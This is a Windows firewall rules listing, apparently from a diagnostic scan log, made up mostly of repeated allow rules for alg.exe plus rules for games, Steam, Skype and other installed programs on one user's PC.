FirewallRules: [{AAC19015-0629-43B4-802E-F737975C2F3E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{46D722F1-4D6B-4B6C-94E6-D95B0208DF0D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A8E386FA-A947-4EBD-8BA5-D51EDA841759}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AFAC73C3-A5D3-411B-91FF-D473B0B9B3F5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{406AC703-2022-4C1B-B0EF-14479F9AB35B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{45D555D2-6EB2-48D8-BA56-622BE85264F6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{F7A7DC57-0BCA-40B6-AE52-B81A4F00340B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DF79CCE7-D27A-4E00-8B1B-2644344FE3B4}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{BC075D15-8A6B-434A-873D-23FB429342D4}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{64292204-2017-4C93-A620-779179629E34}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{62781B2C-D391-4E1D-902B-3108B65750EE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D455894D-1196-42EC-A6D0-93C58BA2FB8F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4538B374-E986-47E9-8721-10188D3F9829}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6439378C-ACBB-4774-B26A-A4DE5E10B17D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EE5721D6-84DF-49E0-9A22-3954C1FBA1C5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{689F28CF-0F5A-4E91-A893-8D1AA04C6D52}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{E17C9F2E-356E-485A-92F8-333E3E95F7E3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B91E471E-7429-4037-AA46-2EF9C2F36045}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{78C32E52-BFE1-448D-AC64-CDA6231D107B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CA675389-C6B5-4FF5-85E9-E22ECDC02361}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B0651ECF-218D-412C-99AB-987BFD3B46F6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EEB51221-050F-4677-97FB-5E078F5230CD}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3B4ECF17-69E5-450D-BF97-24D405A718EC}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2CA90B71-006C-4407-A78C-9B42725D3D15}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{76185150-5DA1-4DCA-B7D5-CFFE67CBDC6D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{09437C84-DD3F-4C1D-A527-9A64B8C3C6DE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{00E16651-B36D-470D-A169-8D7F122039B5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EA30B70F-98D3-43DC-BA54-886D4A1AC749}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9681AAC8-A87F-498A-B4DE-E9109FF84E16}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{375AD8DB-AB06-4CFF-AEC2-AE72D94BB7D9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CA161FDB-2B01-4E7F-A394-1612076E9D1C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1F3EE75A-285D-43A3-9A39-4E798F657A9F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6B4E7CF9-8642-4DFD-8C7B-A3DD1CD0BAB8}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7719801A-5EC1-40CA-AF7C-C9F9BFC3CC09}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6E2F20A5-3739-40FE-A703-424F30A1DF78}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EB1F5960-3864-4087-8E55-9CE86D603A66}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9863874D-E81F-4509-982B-2072FED8FA10}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{53874B5F-3C78-4ABD-9192-6842711F17FE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{38087112-493B-4CDE-9634-D1DD22AF718E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C5EAA576-7A79-438A-B6DC-607AF96C854A}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{42A7C93B-5F36-48A3-8648-1E6C500F3E93}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{66642769-37D1-4366-8A11-BFC1A7D35A55}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6218D665-6CA1-45C3-A4FC-2BD972C69099}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{67E10703-C741-4C91-B350-AEA43F2ECF37}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3754096A-D0A4-4C33-B1F3-BC8A3BE674E9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{BA10E43B-F87E-4A61-85DE-0D412A26EAC3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{BA28310F-F94C-43A8-BED5-D3D21D6C5F8B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8BB5E751-862C-4828-ACE5-AB878F38327E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{5DFDA1E1-B834-47A5-B0E3-C7351EA6625C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{30A30051-D178-4A80-BFE1-EEFB11A86802}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4D88FE5E-BC3F-4278-BE6F-0CAFFF67C382}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C0784789-93E4-4900-9729-F616EB25F21D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{823DFFD6-E542-49A1-8403-2B72F9320455}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{196F2A08-26CA-485E-BCB3-43D525B68310}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C0E11366-7FC3-44CA-AE24-BB494BF50F0C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{48BEBF60-25CC-4A9B-9597-D31DD78F523B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CA9D13FC-9AF1-49AC-8726-AF3A33BA7BDE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{57B7E2CE-C345-4244-9E0E-1D1B9EE98E11}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DEE9ED93-1FB8-4157-9B55-235395B91C0F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9562DE8F-4C96-4B89-BF3B-56C19DEED665}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{28E1B578-69BF-4E9C-9304-9242BCB8D067}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D8080A3F-0275-40D3-BE7F-D1A04E069AB9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DFD79F1A-E9C8-4C38-95D7-C2FE6F2E6FCC}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4848D1DD-C843-45A2-8B27-F7D4B4CB13A3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D919BD13-8AC4-4FCD-A58E-5A52E614D229}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{07A18EE1-2E6C-4D9F-A164-BE72879387DE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D0272FD1-7EB9-4F71-B63F-07312068F1EA}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7F3BD7AD-00EF-4887-AF50-5C76CA74173C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DFA7766F-A3B4-4C29-9FD3-E11C5CC0E771}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{15E8E8DD-904B-4711-B5D2-9145F970F109}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{767339C8-EA44-4B26-A9B4-6CAAA9DD6E2E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{38308754-5F62-47C1-A2EA-4EBE7F003A87}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CEA472F9-3557-4C63-AF00-AE27DF5FC897}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [UDP Query User{19082667-24B8-4376-A7AA-D52C39EBC355}E:\aezia's game\call of duty - black ops\blackops.exe] => (Allow) E:\aezia's game\call of duty - black ops\blackops.exe
FirewallRules: [TCP Query User{F19DE709-2D0E-46FE-BD53-1EDC0ECBD0F5}E:\aezia's game\call of duty - black ops\blackops.exe] => (Allow) E:\aezia's game\call of duty - black ops\blackops.exe
FirewallRules: [{3BCC9538-74B5-418C-AEB1-07F919429CB2}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{967801FA-B52D-4561-9D7B-95E8157445E6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CDEB2DAF-E188-41EB-9F48-BEFED8B991F9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{28275656-D921-41AE-B3DC-EB27A47169B1}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{246730D1-16B1-40FC-8359-F0B112F0BF93}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2F135B79-9BB2-42D6-987A-1BE2493BA78F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8BDEB471-9EC9-48E4-BBE0-CC3189546B11}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{077B8755-7745-4B6B-A213-5A4A47C0B225}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4B080BC1-4E17-410E-8E11-823099A0F2D0}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{FD389367-4946-4CC5-B0A9-2048889C0E99}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{344E5B43-DC74-428E-9A57-2D0A39391E97}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{32739ABC-9F68-4BFC-9B6F-367A8B26E243}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9A34CA05-150D-491C-A536-6E8E6851CE63}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{321C5857-2BFB-4400-B84E-B67E5A26E19C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8B4A04D6-9645-4298-A161-D389E4C89B4E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3938EA39-BA51-4EB9-ACFC-44294D27FDEA}] => (Allow) C:\Program Files (x86)\Origin Games\Need for Speed™ Most Wanted\NFS13.exe
FirewallRules: [{671EC08B-749C-43BE-BABF-F34498639724}] => (Allow) C:\Program Files (x86)\Origin Games\Need for Speed™ Most Wanted\NFS13.exe
FirewallRules: [{39AE9233-47F4-43C4-9394-877DB50C6B4C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2BEF3299-11B3-497E-BCDB-B6C3444E4E1D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{49235FED-ABE0-4740-9788-7BDDD77C1502}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{E4548ECF-EDB5-46F0-9E06-7285EC55D59B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D21F8DBF-A45D-4D89-ABCC-34DD94095E1A}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3ADA85E9-AE8A-440B-BE0F-F2F17354C902}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2FF6CD33-886F-489B-8EF0-B9079F9DF44C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A6A9DAB4-00F5-4044-B95F-6345B749A79F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{F59EB6EE-533E-4A05-93C7-C0D543AC4560}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B7C21979-6A60-4E19-8A26-CA8E934E7956}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DF09BE84-A531-4E40-BF9F-469C9B3C76ED}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B9904C9B-8867-4B2E-B4F0-F5BDC1A9FBE6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{027A93C3-A132-495D-8E55-1EEA3C9A0E1A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{51B91CC4-EB4E-4B39-90FF-C46F31E2CAD8}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DC143665-2841-44B5-9EB7-94D8EFDE18BC}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7AEF5958-656F-4E7B-8681-D1F6826BE832}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{F2709376-A78D-41CD-A3B5-7F0703430F48}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{72D91B83-3A6A-45C7-8585-ACE286FEA70A}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{051343D2-3731-45D4-B729-9A62C2112B93}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{014880E8-E926-4F0B-85CF-47371027AC38}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{98678345-4DA3-4C9F-A128-1202F5A977B0}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{5A7958B8-B274-4300-8A37-CFECFD3A71BD}] => (Allow) E:\Aezia's Game\Call Of Duty Modern Warfare\iw3mp.exe
FirewallRules: [{9B01F0C6-268A-4EAE-9716-E1073F63BFBE}] => (Allow) E:\Aezia's Game\Call Of Duty Modern Warfare\iw3mp.exe
FirewallRules: [{16D61675-D219-44B1-A131-DB54594D6472}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9AB99274-A77A-43A5-9AAF-BECACAE6E617}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9A5C6DE0-AF71-4D59-8321-AB592F342033}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{FF236F8F-F488-41B9-9F9A-00999F587BA3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F282B264-BE1D-4B20-8828-3C745E1B8879}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{0501BBC5-E8A3-4308-BC33-20782F25F652}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D664ECCC-0E3B-481D-9B03-1BAAB58D0A63}] => (Allow) E:\Aezia's Game\Just Cause 2\JustCause2.exe
FirewallRules: [{4F6F1CEE-C69F-4BD9-9E49-AD901922ACCC}] => (Allow) E:\Aezia's Game\Just Cause 2\JustCause2.exe
FirewallRules: [{E106E5D2-1CA1-4775-9188-F2B0ECF325D2}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2DC213BB-1BD0-4EA2-8F64-AAF4D229EDB1}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C4CB26E8-FC1B-4843-8CF0-FD3F7B5362A3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{49108EDF-B7AB-45D2-BB1C-4F7FD0B83D6E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8C09A6E7-34D0-4460-BDA0-C1D0A58CB4C7}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2DCAEDE3-111D-40C5-BBBA-540CEA121955}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{80D72B7F-4D51-4B48-A163-ECCFDE522BC2}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{17659157-C584-4C03-AEF7-2795E77F7DF9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{228ABC87-996C-4EF3-9111-656971C355DA}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9D909198-9D91-4030-8A0D-32D1B6D77636}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AB4C461A-C5DF-4C70-B299-DA36F38A9D0D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{63DA4F9A-D51B-4439-8848-6DF6141DDE1A}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AE92C178-61F0-4B41-A8B1-58486A2DD843}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D419B822-AB55-499D-A0AA-5CBA1672A99C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CDDCB9A1-0CC1-4165-912E-275C1D75B2F0}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D87F50B4-0608-4921-BF5E-3450A2FF2A71}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{37A4A8C0-C7D7-449C-8F55-94E759F4832F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8EF0E1E1-2271-40CC-8FE6-B297997CAD0F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{30EB2D41-20D9-4BE1-8050-C1F4E3C27440}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{473975C6-4D70-47D7-8478-3FEFE4F2C8F9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1A48F8B7-89CD-4197-A6B1-824CCBA064E5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{87FFF93A-7F0B-445D-84B1-096C695CC361}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CD2092D6-810E-4A59-8EF5-86531A75A3B3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{56400AE9-27FF-4DD4-B145-B2149B8E2381}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3BA11120-2A69-455B-AC60-86EE8594FB8E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7ADA40A8-33C9-45CB-BEBE-E6017B0A20F6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C6019768-AD1D-4335-AA10-EDB3602649D2}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{E03F49E2-0823-429B-97F7-27E1A40B9ED3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{970E3A92-7734-4F19-AD7C-FF143E60DB49}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{937A7B17-186F-4840-99EE-BFD940D83A57}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1FC83FE0-DEB8-4DE3-84BA-C9647F030739}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3DDAC0DC-B4A1-4435-BBA3-4E4B3E2FF583}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EB31CD41-E26C-4A49-9864-06190B2BAA62}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{227E22CD-29F1-4406-A6CC-7097BF0F8467}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{5CEBDA08-EF3B-4C25-BFA6-1C73A57757D9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{22A12CC8-B4E9-44FA-8062-05888961F844}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B727A9A4-F280-4CF8-BA7A-D3C2978CB662}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{E905CC00-4BD4-4D0C-B808-BF9FC48EA25B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{5C45EEA8-06A9-4616-B8DD-364D3BD0C450}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4A6E33B7-B1C4-46B8-943D-9F66D9085C97}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C0F7B0A0-EE14-4E65-8C0A-6272FA84824D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7708CE41-6839-4374-8532-D7277AF4B71C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7C274D0B-D474-4663-93B2-9914CEC0FE04}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7EEF0DD3-D8DC-4109-A457-4C1F2AEF1009}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3B4162FA-0DBC-4DB7-8BAA-01B1EABB337B}] => (Allow) C:\Program Files (x86)\ASUS\PC Link\PCLinkService.exe
FirewallRules: [UDP Query User{1AB46E89-FAEE-4E26-9603-F564FFE1187B}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe
FirewallRules: [TCP Query User{784BAE50-9A40-4037-B3C7-ABF57C3821AD}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe
FirewallRules: [{71537B66-B535-4CFD-B987-8A029E889D58}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A680296E-3D8A-48E4-8C3C-32965363665C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{156ED0C8-C254-427E-86F8-CEF3FA99E3A5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6DDE5B79-5580-41E7-AD44-D8446C64FACD}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{35168DA4-5474-4FF5-9AA3-28F766EBF0EE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1D8BD25E-78A9-4CDE-8AED-CC5F6BF30FAA}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C7B20503-46B2-4C01-AABD-CEEB1DBEE4BD}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{35EEBF3F-8B27-49F7-A6DA-F886D627CA53}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [UDP Query User{3B700086-B0F5-47F6-A1A2-F4B08C0EFA2E}C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe
FirewallRules: [TCP Query User{B7EC860D-A299-46C7-A894-324566236CBB}C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe
FirewallRules: [{7015A928-C832-4EF8-98B4-9C971793BA11}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{0F8505D4-2869-4682-A8EC-17E8AA888602}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2B0D4A0D-C279-4247-AB3E-2D71ABC75BF1}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [UDP Query User{E36B864B-C0E7-4232-8558-717726ADD541}C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwawmp.exe] => (Allow) C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwawmp.exe
FirewallRules: [TCP Query User{8A5B77D0-558D-44F0-99F1-F686A6135CE5}C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwawmp.exe] => (Allow) C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwawmp.exe
FirewallRules: [UDP Query User{5466594D-B6DE-48DF-B28F-EA3B4B6CC878}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{3F2C3A10-C907-4367-9268-2D8372952A20}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{B54676D6-DF1E-4344-BF1C-740E7D25878E}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe
FirewallRules: [TCP Query User{A55B0AEC-527D-4892-94F7-5B073AC6A1AD}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe
FirewallRules: [{A86B85A0-4E67-4B57-A00C-93C6A749C10D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{63C1EC08-7977-4ECC-954D-A7619A7153DE}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [UDP Query User{E0376A0A-9A6A-4F91-BFB8-313812F511E9}C:\users\aezia aznan\downloads\resident evil revelations 2\dying light\human.fall.flat.v1.1.2\human.fall.flat.v1.1.2\human.exe] => (Allow) C:\users\aezia aznan\downloads\resident evil revelations 2\dying light\human.fall.flat.v1.1.2\human.fall.flat.v1.1.2\human.exe
FirewallRules: [TCP Query User{13F2E030-AF22-4403-964B-6749B6C96840}C:\users\aezia aznan\downloads\resident evil revelations 2\dying light\human.fall.flat.v1.1.2\human.fall.flat.v1.1.2\human.exe] => (Allow) C:\users\aezia aznan\downloads\resident evil revelations 2\dying light\human.fall.flat.v1.1.2\human.fall.flat.v1.1.2\human.exe
FirewallRules: [{B3CD11BC-F999-4AF3-B1B3-3516DE8E9BFE}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\AssassinsCreedRevelations.exe
FirewallRules: [{7F5B392C-25EF-4605-80D9-FF87DF1EB887}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\AssassinsCreedRevelations.exe
FirewallRules: [{6CA515E6-E9DC-4877-8EAC-CEE2F26653FD}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\ACRMP.exe
FirewallRules: [{1A61F270-97FF-490A-8B74-71EAA887100D}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\ACRMP.exe
FirewallRules: [{0FE1AD92-ED5C-4D26-94FB-715F8140FE4D}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\ACRSP.exe
FirewallRules: [{9112FF7F-9C2E-4F1D-84D5-9B5CBF1C5BFC}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\ACRSP.exe
FirewallRules: [UDP Query User{44913227-695C-4845-B329-839A6365B992}C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwaw.exe] => (Allow) C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwaw.exe
FirewallRules: [TCP Query User{807062EF-D522-4536-AAC1-FF930DDC1250}C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwaw.exe] => (Allow) C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwaw.exe
FirewallRules: [{0835796E-59E1-4773-AE08-1F5CA9CFA340}] => (Allow) C:\Program Files (x86)\Baidu WiFiHotspot\WifiHotspot.exe
FirewallRules: [{DA05559F-80CE-4C8A-8AD0-15743CFA6BC0}] => (Allow) C:\Program Files (x86)\Baidu WiFiHotspot\WifiHotspot.exe
FirewallRules: [{FAAE5D37-46B1-4367-B859-5453FCC0992D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\diriptide\DeadIslandGame_x86_rwdi.exe
FirewallRules: [{A611BEF8-380A-409F-8501-85AC79A769AE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\diriptide\DeadIslandGame_x86_rwdi.exe
FirewallRules: [UDP Query User{8C035CF4-5D06-4422-B61A-3A36D4417AC4}C:\program files (x86)\capcom\resident evil 5\re5dx9.exe] => (Allow) C:\program files (x86)\capcom\resident evil 5\re5dx9.exe
FirewallRules: [TCP Query User{2163F200-D661-46D7-B437-4FD1585D6FA4}C:\program files (x86)\capcom\resident evil 5\re5dx9.exe] => (Allow) C:\program files (x86)\capcom\resident evil 5\re5dx9.exe
FirewallRules: [UDP Query User{9EC9076B-42C7-4716-974B-021FAAE2D46B}C:\program files (x86)\capcom\resident evil 5\re5dx10.exe] => (Allow) C:\program files (x86)\capcom\resident evil 5\re5dx10.exe
FirewallRules: [TCP Query User{F2FB9F0E-3013-41F4-9BEC-1D47F620078C}C:\program files (x86)\capcom\resident evil 5\re5dx10.exe] => (Allow) C:\program files (x86)\capcom\resident evil 5\re5dx10.exe
FirewallRules: [{F175ABDB-6B03-4E6D-9648-89E28B513994}] => (Allow) C:\Program Files (x86)\Capcom\RESIDENT EVIL 5\RE5DX10.EXE
FirewallRules: [{3AFA54D7-D4CD-4190-A920-CA376CE71700}] => (Allow) C:\Program Files (x86)\Capcom\RESIDENT EVIL 5\RE5DX10.EXE
FirewallRules: [{23719FE1-81F5-495C-B123-BBF6135FAC84}] => (Allow) C:\Program Files (x86)\Capcom\RESIDENT EVIL 5\RE5DX9.EXE
FirewallRules: [{322D6D0D-FE7E-46FD-B08E-5688087E52E9}] => (Allow) C:\Program Files (x86)\Capcom\RESIDENT EVIL 5\RE5DX9.EXE
FirewallRules: [UDP Query User{5E714BCB-F367-4208-9340-75A4B1C12DF0}C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe
FirewallRules: [TCP Query User{BD11A925-2E8C-4F30-8C75-648640C8CE8E}C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe
FirewallRules: [UDP Query User{68F5AD81-DDC5-43CB-A46A-4DEE5423F99C}\\usr-pc\gamehouse\resident evil 6\bh6.exe] => (Allow) \\usr-pc\gamehouse\resident evil 6\bh6.exe
